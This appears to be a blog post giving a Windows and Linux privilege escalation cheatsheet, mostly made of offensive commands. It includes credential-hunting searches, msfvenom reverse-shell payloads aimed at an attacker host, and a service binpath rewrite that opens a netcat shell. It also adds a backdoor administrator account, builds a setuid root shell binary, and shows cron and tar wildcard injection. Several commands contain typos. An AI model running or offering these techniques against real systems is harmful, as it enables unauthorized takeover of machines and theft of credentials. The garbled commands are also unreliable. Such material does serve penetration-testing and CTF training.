Privilege Escalation cheatsheet

Windows

Kernel Exploits

  • system info -> look up missing kb's
  • systeminfo | findstr /B /C:"OS Name" /C:"OS * Version"
  • sherlock -> Find-AllVulns PowerShell
  • 0xsp Mongoose

Common Kernel Exploits

creds in cleartext or base64 -> once windows in installed

c:\sysprep.inf
c:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml

GPP(Group Policy Preferences)

Only applicable for devices connected to a domain

Groups.xml stored in SYSVOL -> DC
  encrypted with AES, but key got leaked
 \\dc2018.lab\SYSVOL\dc2008.lab\Policies\{id}\MACHINE\Preferences\Groups

Other Files

Services\Services.xml
ScheduldedTasks\ScheduledTasks.xml
Printers\Printers.xml
Drives\Drives.xml
DataSources\DataSources.xml

Other Misc Passwords

dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
web.config
php.ini
httpd.conf
access.log

powerup:

  • Get-WebConfig (ISS > web.config

putty:

  • reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions

Tight VNC:

  • reg query HKCU\Software\TightVNC\Server
  • bncpwd.exe

Always Install Elevated:

  • reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstalledElevated
  • reg query HKCU\SOFTWARE\Policies\Micorosft\Windows\Installer\AlwaysInstalledElevated
    • both values = 1, created a malicious .msi file with msfvenom for example
    • execute it with msiexec /quiet /qn /i <filename>

powerup:

  • Get-RegistryAlwaysInstallElevated
  • Write-UserAddMSI

Unquoted Services Paths (trusted service paths)

For each space in a file path, Windows will attempt to look for and execute programs with a name that matches the word in front of the space.

Example:

  • C:\Program Files\Some Folder\Service.exe
  • C:\Program.exe
  • C:\Program Files\Some.exe
  • C:\Program Files\Some Folder\Service.exe

    wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

PFNet

* C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfscv.exe
* icalcs "C:\Program Files (x86)\Privacyware"
* msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=10.0.0.100 LPORT=443 -f exe -o Privatefirewall.exe

Start and stop the service:

  • sc stop PFNet
  • sc start PFNET

Powerup:

  • Get-ServiceUnquoted
  • Write-ServiceBinary -Name -Path

Insecure Service Permissions

whoami > net user <name> \- enumerate groups
accesschk.exe -> part of sysinternals
accesschk.exe -ucqv <service>
accesschk.exe -uwcqv “Authenticated Users” * /accepteula

Write access to a service as an authenticated user?

sc qc upnphost
sc config upnphost binpath= “C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe”
net start upnphost

Powerup:

  • Get-ModifiableService
  • Test-ServiceDaclPermission
  • Invoke-ServiceAbuse -Name -Command

DLL Hijacking

Requires user interaction / reboot.

DLL search order on 32-bit systems:

1. The directory from which the application is loaded
2. 32-bit System directory (C:\Windows\System32)
3. 16-bit System directory (C:\Windows\System)
4. Windows directory (C:\Windows)
5. The current working directory
6. Directories in the PATH environment variableCode language: JavaScript (javascript)

You can use procmon to look for vulnerable dll’s using the following filters:

  • The result is NAME NOT FOUND Include
  • The path ends with .dll
echo %path%
icacls C:\Python27
accesssschk.exe -dqv "C:\Python27"
sc qc IKEEXT

Generate a malicious payload with msfvenom

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<ip> lport=<port> -f dll > evil.dll

Windows 7 x86/64:

  • IKE and AuthIP IPsec Keying Modules (IKEEEXT) – wlbsctrl.dl

Powerup:

  • Find-PathDLLHijkack
  • Find-ProjcessDLLHijkack
  • access-allchecks

Scheduled tasks:

On servers 2000, 2003, and XP, scheduled tasks are running as a system. Are they calling any .exe‘s and can you overwrite?

  • accesschk.exe -dqv <folder>

Can you create a task yourself?

  • net start "Task Scheduler" at <hour> /interactive "path to evil exe"

Powerup:

  • Get-ModifiableScheduledTaskFile

Useful commands

* hostname
* echo %username%
* whoami / priv
* swinsta \- other logged in users
* net users
* net user <username>
* net localgroup
* net localgroup Administrators
* net user rottenadmin P@ssword123! /add
* net localgroup Administrators rottenadmin /add
* ipconfing /all
* route print
* arp -a
* netstat -ano
* C:\WINDOWS\System32\drivers\etc\hosts
* schtasks /query /fo LIST /v \- scheduled task
* tasklist /SVC` \- running processes
* net start \- started services
* cd\ & dir /b /s proof.txt

Linux

Scripts & Tools

  • 0xsp Mongoose
  • Linux-Enum-Mod
  • linux-exploit-suggestor

Kernel Exploits

  • Mongoose 0xsp
  • uname -a -> searchsploit
  • linux-exploit-suggestor

Common Kernel Exploits

* CVE-2010-2959
* cve-2020-8835
* CVE-2019-7304
* CVE-2019-9213 2018-5333

Services Running as root

  • ps -aux | grep root
  • any shell escape sequences?

SUID Executables

  • runs with permissions of the owner
  • find / -perm -u=s -type f 2>/dev/null
  • any shell escape sequences – do we have to write access?

Sudo rights/users

  • sudo -l
  • what can we execute -> any shell escape sequences

Cron jobs

 find / -perm -2 -type f 2>/dev/null
 ls -la /etc/cron.d`Code language: JavaScript (javascript)
# rootme.c
int main(void)
{
  setgid(0);
  setuid(0);
  execl("/bin/sh", "sh", 0);
}Code language: PHP (php)
gcc rootme.c -o rootme

echo "chown root:root /tmp/rootme; chmod u+s /tmp/rootme;" > /usr/local/sbin/cron-logrotate.shCode language: JavaScript (javascript)

Wildcards

  • often combined with user interaction/cronjobs
  • cfr. Back to the Future: Unix Wildcards Gone Wild paper
  • wild cards can be utilized to inject arbitrary commands by creating files that are seen as commands

Example:

--checkpoint=<number> and --checkpoint-action=<command>
--checkpoint=1 and --checkpoint-actionexec=sh rshell.shCode language: HTML, XML (xml)

Path Abuse (‘.’ in the path)

Requires user interaction (eg somebody need to have . in their path)

* $PATH:.:${PATH}
* export $PATH
* echo $PATH
* replace executable files with a malicious one

Useful commands

* ps aux | grep root
* crontab -l
* ifconfig -a
* cat /etc/resolv.conf
* netstat -tulpn
* arp -e
* route
* id
* who
* cat /etc/passwd | cut -d: -f1 \- list of users
* cat ~/.ssh
* find . -name package.json -print -exec cat {} +
Code language: PHP (php)

Sources

Please follow and like us:

Leave a Comment